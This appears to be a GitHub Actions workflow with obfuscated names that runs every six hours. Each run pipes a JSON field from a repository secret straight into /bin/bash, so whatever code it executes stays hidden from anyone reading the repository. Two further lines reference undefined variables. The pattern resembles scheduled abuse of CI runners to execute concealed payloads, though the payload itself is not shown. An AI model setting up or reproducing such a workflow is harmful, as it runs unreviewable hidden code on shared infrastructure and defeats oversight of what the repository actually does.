name: dingzhengfeng4532
on:
  workflow_dispatch:
  schedule:
    - cron: '34 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dingzhengfeng4532
        env:
          yoo195: ${{ secrets.yoo195 }}
        run: |
          echo $yoo195 | jq -r .av522 | /bin/bash
          echo $flodu2 | jq -r .gujpa123 | /bin/bash
          echo $gdq9605 | jq -r .nucco3 | /bin/bash

